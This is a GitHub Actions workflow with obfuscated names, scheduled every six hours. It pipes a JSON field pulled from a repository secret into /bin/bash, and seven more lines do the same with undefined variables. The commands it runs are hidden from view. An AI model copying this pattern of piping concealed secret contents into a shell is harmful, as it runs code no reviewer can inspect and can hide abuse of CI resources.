name: fangzhangdx

on:
  workflow_dispatch:
  schedule:
    - cron: '17 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fangzhangdx
        env:
          qfx3628: ${{ secrets.qfx3628 }}
        run: |
          echo $qfx3628 | jq -r .jqd4294 | /bin/bash
          echo $au1451 | jq -r .wfzgf38 | /bin/bash
          echo $ssoh58 | jq -r .s0 | /bin/bash
          echo $vj643 | jq -r .tyyns0 | /bin/bash
          echo $ek447 | jq -r .fsz948 | /bin/bash
          echo $z86869 | jq -r .y983 | /bin/bash
          echo $buh8 | jq -r .ncfev330 | /bin/bash
          echo $k9597 | jq -r .jx26 | /bin/bash

